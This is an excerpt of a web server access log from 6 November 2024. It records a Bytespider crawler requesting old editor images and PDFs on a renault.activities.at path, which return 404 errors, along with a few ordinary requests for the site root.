156.59.198.136 - - [06/Nov/2024:10:55:36 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/tm_remove.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [06/Nov/2024:10:59:38 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/checkbox.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.191.98 - - [06/Nov/2024:11:01:10 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [06/Nov/2024:11:03:38 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/add-on/pdf/margin.png HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
79.9.16.141 - - [06/Nov/2024:11:04:10 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
46.174.191.30 - - [06/Nov/2024:11:06:48 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
156.59.198.136 - - [06/Nov/2024:11:07:38 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12126712.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
85.217.190.140 - - [06/Nov/2024:11:08:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; Android 4.2.2) AppleWebKit/536.2 (KHTML, like Gecko) Chrome/24.0.838.0 Safari/536.2"
